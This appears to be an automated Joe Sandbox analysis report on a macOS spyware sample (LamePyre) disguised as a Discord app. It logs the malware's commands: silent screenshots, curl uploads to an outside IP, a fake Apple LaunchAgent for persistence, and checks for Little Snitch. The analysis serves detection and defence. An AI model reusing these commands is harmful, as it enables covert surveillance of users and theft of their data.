Analysis Report Pe7niErK6B

Overview

General Information

Joe Sandbox Version: 25.0.0
Analysis ID: 65585
Start date: 12.12.2018
Start time: 11:23:26
Joe Sandbox Product: Cloud
Overall analysis duration: 0h 11m 37s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: Pe7niErK6B (renamed file extension from none to app)
Cookbook file name: defaultmacfilecookbook.jbs
Analysis system description: Mac Mini, High Sierra 10.13.2 (MS Office 16.9, Java 1.8.0_25)
Detection: MAL
Classification: mal76.troj.spyw.evad.macAPP@0/34@0/0
Warnings:
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many READ_NOCANCEL calls found.

Detection

Strategy: Threshold
Score: 76
Range: 0 - 100
Reporting: Report FP / FN
Whitelisted: false
Detection: malicious

Classification

Mitre Att&ck Matrix

Initial Access: Valid Accounts; Replication Through Removable Media; Drive-by Compromise
Execution: Command-Line Interface 1; Scripting 31; Windows Management Instrumentation
Persistence: Hidden Files and Directories 1; Launch Daemon 2; Launch Agent 4
Privilege Escalation: Launch Daemon 2; Accessibility Features; Path Interception
Defense Evasion: Masquerading 1; Hidden Files and Directories 1; Scripting 31
Credential Access: Credential Dumping; Network Sniffing; Input Capture
Discovery: Process Discovery 11; Security Software Discovery 1; System Information Discovery 31
Lateral Movement: Application Deployment Software; Remote Services; Windows Remote Management
Collection: Screen Capture 2; Data from Removable Media; Data from Network Shared Drive
Exfiltration: Data Compressed; Exfiltration Over Other Network Medium; Automated Exfiltration
Command and Control: Uncommonly Used Port 1; Standard Application Layer Protocol 11; Custom Cryptographic Protocol

Signature Overview


Networking:

Detected TCP or UDP traffic on non-standard ports
Source: global trafficTCP traffic: 192.168.0.50:49243 -> 37.1.221.204:8080
Connects to IPs without corresponding DNS lookups
Source: unknownTCP traffic detected without corresponding DNS query: 37.1.221.204
Source: unknownTCP traffic detected without corresponding DNS query: 17.253.57.212

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Detected macOS LamePyre spyware
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 566)IOC file dropped: /Users/henry/Library/LaunchAgents/com.apple.systemkeeper.plistJump to dropped file
Captures screenshots with shell command 'screencapture'
Source: /bin/bash (PID: 584)Screen captured: screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Source: /bin/bash (PID: 587)Screen captured: screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Source: /bin/bash (PID: 594)Screen captured: screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Source: /bin/bash (PID: 599)Screen captured: screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Source: /bin/bash (PID: 605)Screen captured: screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Source: /bin/bash (PID: 612)Screen captured: screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Source: /bin/bash (PID: 614)Screen captured: screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Source: /bin/bash (PID: 621)Screen captured: screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Source: /bin/bash (PID: 628)Screen captured: screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Source: /bin/bash (PID: 630)Screen captured: screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Source: /bin/bash (PID: 637)Screen captured: screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Source: /bin/bash (PID: 639)Screen captured: screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Source: /bin/bash (PID: 646)Screen captured: screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Source: /bin/bash (PID: 649)Screen captured: screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Source: /bin/bash (PID: 655)Screen captured: screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Source: /bin/bash (PID: 662)Screen captured: screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Source: /bin/bash (PID: 664)Screen captured: screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Source: /bin/bash (PID: 671)Screen captured: screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Source: /bin/bash (PID: 678)Screen captured: screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Explicitly creates screenshots silently (i.e. without playing sounds)
Source: /bin/bash (PID: 584)Screencapture executable (-x switch): screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Source: /bin/bash (PID: 587)Screencapture executable (-x switch): screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Source: /bin/bash (PID: 594)Screencapture executable (-x switch): screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Source: /bin/bash (PID: 599)Screencapture executable (-x switch): screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Source: /bin/bash (PID: 605)Screencapture executable (-x switch): screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Source: /bin/bash (PID: 612)Screencapture executable (-x switch): screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Source: /bin/bash (PID: 614)Screencapture executable (-x switch): screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Source: /bin/bash (PID: 621)Screencapture executable (-x switch): screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Source: /bin/bash (PID: 628)Screencapture executable (-x switch): screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Source: /bin/bash (PID: 630)Screencapture executable (-x switch): screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Source: /bin/bash (PID: 637)Screencapture executable (-x switch): screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Source: /bin/bash (PID: 639)Screencapture executable (-x switch): screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Source: /bin/bash (PID: 646)Screencapture executable (-x switch): screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Source: /bin/bash (PID: 649)Screencapture executable (-x switch): screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Source: /bin/bash (PID: 655)Screencapture executable (-x switch): screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Source: /bin/bash (PID: 662)Screencapture executable (-x switch): screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Source: /bin/bash (PID: 664)Screencapture executable (-x switch): screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Source: /bin/bash (PID: 671)Screencapture executable (-x switch): screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Source: /bin/bash (PID: 678)Screencapture executable (-x switch): screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior

System Summary:

Writes Python scripts without typical Python file extensions
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 566)Python file created: /Users/henry/.system/.systemkeeperJump to dropped file
Classification label
Source: classification engineClassification label: mal76.troj.spyw.evad.macAPP@0/34@0/0

Persistence and Installation Behavior:

Many shell processes execute programs via execve syscall (may be indicative of malicious behavior)
Source: /bin/sh (PID: 572)Shell process: mkdir -p /Users/henry/.systemJump to behavior
Source: /bin/sh (PID: 573)Shell process: mkdir -p /Users/henry/Library/LaunchAgentsJump to behavior
Source: /bin/sh (PID: 574)Shell process: launchctl load -w /Users/henry/Library/LaunchAgents/com.apple.systemkeeper.plistJump to behavior
Source: /bin/sh (PID: 578)Shell process: ps -efJump to behavior
Source: /bin/sh (PID: 580)Shell process: grep Little SnitchJump to behavior
Source: /bin/sh (PID: 581)Shell process: grep -v grepJump to behavior
Source: /bin/sh (PID: 579)Shell process: ps -efJump to behavior
Source: /bin/sh (PID: 582)Shell process: grep Little SnitchJump to behavior
Source: /bin/sh (PID: 583)Shell process: grep -v grepJump to behavior
Source: /bin/sh (PID: 591)Shell process: ps -ef
Source: /bin/sh (PID: 592)Shell process: grep Little Snitch
Source: /bin/sh (PID: 593)Shell process: grep -v grep
Source: /bin/sh (PID: 601)Shell process: ps -ef
Source: /bin/sh (PID: 602)Shell process: grep Little Snitch
Source: /bin/sh (PID: 603)Shell process: grep -v grep
Source: /bin/sh (PID: 609)Shell process: ps -ef
Source: /bin/sh (PID: 610)Shell process: grep Little Snitch
Source: /bin/sh (PID: 611)Shell process: grep -v grep
Source: /bin/sh (PID: 618)Shell process: ps -ef
Source: /bin/sh (PID: 619)Shell process: grep Little Snitch
Source: /bin/sh (PID: 620)Shell process: grep -v grep
Source: /bin/sh (PID: 625)Shell process: ps -ef
Source: /bin/sh (PID: 626)Shell process: grep Little Snitch
Source: /bin/sh (PID: 627)Shell process: grep -v grep
Source: /bin/sh (PID: 634)Shell process: ps -ef
Source: /bin/sh (PID: 635)Shell process: grep Little Snitch
Source: /bin/sh (PID: 636)Shell process: grep -v grep
Source: /bin/sh (PID: 643)Shell process: ps -ef
Source: /bin/sh (PID: 644)Shell process: grep Little Snitch
Source: /bin/sh (PID: 645)Shell process: grep -v grep
Source: /bin/sh (PID: 651)Shell process: ps -ef
Source: /bin/sh (PID: 652)Shell process: grep Little Snitch
Source: /bin/sh (PID: 653)Shell process: grep -v grep
Source: /bin/sh (PID: 659)Shell process: ps -ef
Source: /bin/sh (PID: 660)Shell process: grep Little Snitch
Source: /bin/sh (PID: 661)Shell process: grep -v grep
Source: /bin/sh (PID: 668)Shell process: ps -ef
Source: /bin/sh (PID: 669)Shell process: grep Little Snitch
Source: /bin/sh (PID: 670)Shell process: grep -v grep
Source: /bin/sh (PID: 675)Shell process: ps -ef
Source: /bin/sh (PID: 676)Shell process: grep Little Snitch
Source: /bin/sh (PID: 677)Shell process: grep -v grep
Uploads files by using the "curl" command and emulating a filled-in form
Source: /bin/bash (PID: 586)Curl file upload using -F: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Source: /bin/bash (PID: 588)Curl file upload using -F: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Source: /bin/bash (PID: 595)Curl file upload using -F: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Source: /bin/bash (PID: 604)Curl file upload using -F: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Source: /bin/bash (PID: 606)Curl file upload using -F: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Source: /bin/bash (PID: 613)Curl file upload using -F: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Source: /bin/bash (PID: 615)Curl file upload using -F: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Source: /bin/bash (PID: 622)Curl file upload using -F: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Source: /bin/bash (PID: 629)Curl file upload using -F: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Source: /bin/bash (PID: 631)Curl file upload using -F: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Source: /bin/bash (PID: 638)Curl file upload using -F: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Source: /bin/bash (PID: 640)Curl file upload using -F: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Source: /bin/bash (PID: 647)Curl file upload using -F: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Source: /bin/bash (PID: 654)Curl file upload using -F: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Source: /bin/bash (PID: 656)Curl file upload using -F: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Source: /bin/bash (PID: 663)Curl file upload using -F: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Source: /bin/bash (PID: 665)Curl file upload using -F: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Source: /bin/bash (PID: 672)Curl file upload using -F: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Source: /bin/bash (PID: 679)Curl file upload using -F: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Creates hidden files, links and/or directories
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 566)Hidden file created: /Users/henry/.system/.helperJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 566)Hidden file created: /Users/henry/.system/.systemkeeperJump to behavior
Source: /usr/sbin/screencapture (PID: 584)Hidden file created: /tmp/.alloy.png-bSGCJump to behavior
Source: /usr/sbin/screencapture (PID: 587)Hidden file created: /tmp/.alloy.png-fVAsJump to behavior
Source: /usr/sbin/screencapture (PID: 594)Hidden file created: /tmp/.alloy.png-trDyJump to behavior
Source: /usr/sbin/screencapture (PID: 599)Hidden file created: /tmp/.alloy.png-CiotJump to behavior
Source: /usr/sbin/screencapture (PID: 605)Hidden file created: /tmp/.alloy.png-JwlgJump to behavior
Source: /usr/sbin/screencapture (PID: 612)Hidden file created: /tmp/.alloy.png-OKVgJump to behavior
Source: /usr/sbin/screencapture (PID: 614)Hidden file created: /tmp/.alloy.png-0JUkJump to behavior
Source: /usr/sbin/screencapture (PID: 621)Hidden file created: /tmp/.alloy.png-ScvrJump to behavior
Source: /usr/sbin/screencapture (PID: 628)Hidden file created: /tmp/.alloy.png-3tBvJump to behavior
Source: /usr/sbin/screencapture (PID: 630)Hidden file created: /tmp/.alloy.png-9exNJump to behavior
Source: /usr/sbin/screencapture (PID: 637)Hidden file created: /tmp/.alloy.png-NqNkJump to behavior
Source: /usr/sbin/screencapture (PID: 639)Hidden file created: /tmp/.alloy.png-MR2YJump to behavior
Source: /usr/sbin/screencapture (PID: 646)Hidden file created: /tmp/.alloy.png-8UHLJump to behavior
Source: /usr/sbin/screencapture (PID: 649)Hidden file created: /tmp/.alloy.png-lIjKJump to behavior
Source: /usr/sbin/screencapture (PID: 655)Hidden file created: /tmp/.alloy.png-whQ4Jump to behavior
Source: /usr/sbin/screencapture (PID: 662)Hidden file created: /tmp/.alloy.png-WEFKJump to behavior
Source: /usr/sbin/screencapture (PID: 664)Hidden file created: /tmp/.alloy.png-Idi5Jump to behavior
Source: /usr/sbin/screencapture (PID: 671)Hidden file created: /tmp/.alloy.png-ykTwJump to behavior
Source: /usr/sbin/screencapture (PID: 678)Hidden file created: /tmp/.alloy.png-17crJump to behavior
Executes commands using a shell command-line interpreter
Source: /Users/henry/Desktop/unpack/DiscordApp.app/Contents/MacOS/Application Stub (PID: 561)Shell command executed: /bin/bash -c PAYLOAD_DATA='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 to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 572)Shell command executed: /bin/sh -c mkdir -p /Users/henry/.systemJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 573)Shell command executed: /bin/sh -c mkdir -p /Users/henry/Library/LaunchAgentsJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 574)Shell command executed: /bin/sh -c launchctl load -w /Users/henry/Library/LaunchAgents/com.apple.systemkeeper.plistJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 576)Shell command executed: /bin/sh -c ps -ef | grep Little\ Snitch | grep -v grepJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 577)Shell command executed: /bin/sh -c ps -ef | grep Little\ Snitch | grep -v grepJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 590)Shell command executed: /bin/sh -c ps -ef | grep Little\ Snitch | grep -v grep
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 600)Shell command executed: /bin/sh -c ps -ef | grep Little\ Snitch | grep -v grep
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 608)Shell command executed: /bin/sh -c ps -ef | grep Little\ Snitch | grep -v grep
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 617)Shell command executed: /bin/sh -c ps -ef | grep Little\ Snitch | grep -v grep
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 624)Shell command executed: /bin/sh -c ps -ef | grep Little\ Snitch | grep -v grep
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 633)Shell command executed: /bin/sh -c ps -ef | grep Little\ Snitch | grep -v grep
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 642)Shell command executed: /bin/sh -c ps -ef | grep Little\ Snitch | grep -v grep
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 650)Shell command executed: /bin/sh -c ps -ef | grep Little\ Snitch | grep -v grep
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 658)Shell command executed: /bin/sh -c ps -ef | grep Little\ Snitch | grep -v grep
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 667)Shell command executed: /bin/sh -c ps -ef | grep Little\ Snitch | grep -v grep
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 674)Shell command executed: /bin/sh -c ps -ef | grep Little\ Snitch | grep -v grep
Executes the "curl" command used to transfer data via the network (typically using HTTP/S)
Source: /bin/bash (PID: 586)Curl executable: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Source: /bin/bash (PID: 588)Curl executable: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Source: /bin/bash (PID: 595)Curl executable: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Source: /bin/bash (PID: 604)Curl executable: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Source: /bin/bash (PID: 606)Curl executable: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Source: /bin/bash (PID: 613)Curl executable: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Source: /bin/bash (PID: 615)Curl executable: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Source: /bin/bash (PID: 622)Curl executable: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Source: /bin/bash (PID: 629)Curl executable: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Source: /bin/bash (PID: 631)Curl executable: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Source: /bin/bash (PID: 638)Curl executable: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Source: /bin/bash (PID: 640)Curl executable: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Source: /bin/bash (PID: 647)Curl executable: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Source: /bin/bash (PID: 654)Curl executable: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Source: /bin/bash (PID: 656)Curl executable: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Source: /bin/bash (PID: 663)Curl executable: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Source: /bin/bash (PID: 665)Curl executable: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Source: /bin/bash (PID: 672)Curl executable: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Source: /bin/bash (PID: 679)Curl executable: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Executes the "grep" command used to find patterns in files or piped streams
Source: /bin/sh (PID: 580)Grep executable: /usr/bin/grep -> grep Little SnitchJump to behavior
Source: /bin/sh (PID: 581)Grep executable: /usr/bin/grep -> grep -v grepJump to behavior
Source: /bin/sh (PID: 582)Grep executable: /usr/bin/grep -> grep Little SnitchJump to behavior
Source: /bin/sh (PID: 583)Grep executable: /usr/bin/grep -> grep -v grepJump to behavior
Source: /bin/sh (PID: 592)Grep executable: /usr/bin/grep -> grep Little Snitch
Source: /bin/sh (PID: 593)Grep executable: /usr/bin/grep -> grep -v grep
Source: /bin/sh (PID: 602)Grep executable: /usr/bin/grep -> grep Little Snitch
Source: /bin/sh (PID: 603)Grep executable: /usr/bin/grep -> grep -v grep
Source: /bin/sh (PID: 610)Grep executable: /usr/bin/grep -> grep Little Snitch
Source: /bin/sh (PID: 611)Grep executable: /usr/bin/grep -> grep -v grep
Source: /bin/sh (PID: 619)Grep executable: /usr/bin/grep -> grep Little Snitch
Source: /bin/sh (PID: 620)Grep executable: /usr/bin/grep -> grep -v grep
Source: /bin/sh (PID: 626)Grep executable: /usr/bin/grep -> grep Little Snitch
Source: /bin/sh (PID: 627)Grep executable: /usr/bin/grep -> grep -v grep
Source: /bin/sh (PID: 635)Grep executable: /usr/bin/grep -> grep Little Snitch
Source: /bin/sh (PID: 636)Grep executable: /usr/bin/grep -> grep -v grep
Source: /bin/sh (PID: 644)Grep executable: /usr/bin/grep -> grep Little Snitch
Source: /bin/sh (PID: 645)Grep executable: /usr/bin/grep -> grep -v grep
Source: /bin/sh (PID: 652)Grep executable: /usr/bin/grep -> grep Little Snitch
Source: /bin/sh (PID: 653)Grep executable: /usr/bin/grep -> grep -v grep
Source: /bin/sh (PID: 660)Grep executable: /usr/bin/grep -> grep Little Snitch
Source: /bin/sh (PID: 661)Grep executable: /usr/bin/grep -> grep -v grep
Source: /bin/sh (PID: 669)Grep executable: /usr/bin/grep -> grep Little Snitch
Source: /bin/sh (PID: 670)Grep executable: /usr/bin/grep -> grep -v grep
Source: /bin/sh (PID: 676)Grep executable: /usr/bin/grep -> grep Little Snitch
Source: /bin/sh (PID: 677)Grep executable: /usr/bin/grep -> grep -v grep
Executes the "mkdir" command used to create folders
Source: /bin/sh (PID: 572)Mkdir executable: /bin/mkdir -> mkdir -p /Users/henry/.systemJump to behavior
Source: /bin/sh (PID: 573)Mkdir executable: /bin/mkdir -> mkdir -p /Users/henry/Library/LaunchAgentsJump to behavior
Executes the "ps" command used to list the status of processes
Source: /bin/sh (PID: 578)Ps executable: /bin/ps -> ps -efJump to behavior
Source: /bin/sh (PID: 579)Ps executable: /bin/ps -> ps -efJump to behavior
Source: /bin/sh (PID: 591)Ps executable: /bin/ps -> ps -ef
Source: /bin/sh (PID: 601)Ps executable: /bin/ps -> ps -ef
Source: /bin/sh (PID: 609)Ps executable: /bin/ps -> ps -ef
Source: /bin/sh (PID: 618)Ps executable: /bin/ps -> ps -ef
Source: /bin/sh (PID: 625)Ps executable: /bin/ps -> ps -ef
Source: /bin/sh (PID: 634)Ps executable: /bin/ps -> ps -ef
Source: /bin/sh (PID: 643)Ps executable: /bin/ps -> ps -ef
Source: /bin/sh (PID: 651)Ps executable: /bin/ps -> ps -ef
Source: /bin/sh (PID: 659)Ps executable: /bin/ps -> ps -ef
Source: /bin/sh (PID: 668)Ps executable: /bin/ps -> ps -ef
Source: /bin/sh (PID: 675)Ps executable: /bin/ps -> ps -ef
Executes the "python" command used to interpret Python scripts
Source: /bin/bash (PID: 566)Python executable: /usr/bin/python -> /usr/bin/pythonJump to behavior
Explicitly loads/starts launch services
Source: /bin/sh (PID: 574)Launch agent/daemon loaded: launchctl load -w /Users/henry/Library/LaunchAgents/com.apple.systemkeeper.plistJump to behavior
Reads launchservices plist files
Source: /Users/henry/Desktop/unpack/DiscordApp.app/Contents/MacOS/Application Stub (PID: 561)Launchservices plist file read: /Users/henry/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plistJump to behavior
Source: /Users/henry/Desktop/unpack/DiscordApp.app/Contents/MacOS/Application Stub (PID: 561)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Source: /usr/sbin/screencapture (PID: 584)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Source: /usr/sbin/screencapture (PID: 587)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Source: /usr/sbin/screencapture (PID: 594)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Source: /usr/sbin/screencapture (PID: 599)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Source: /usr/sbin/screencapture (PID: 605)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Source: /usr/sbin/screencapture (PID: 612)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Source: /usr/sbin/screencapture (PID: 614)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
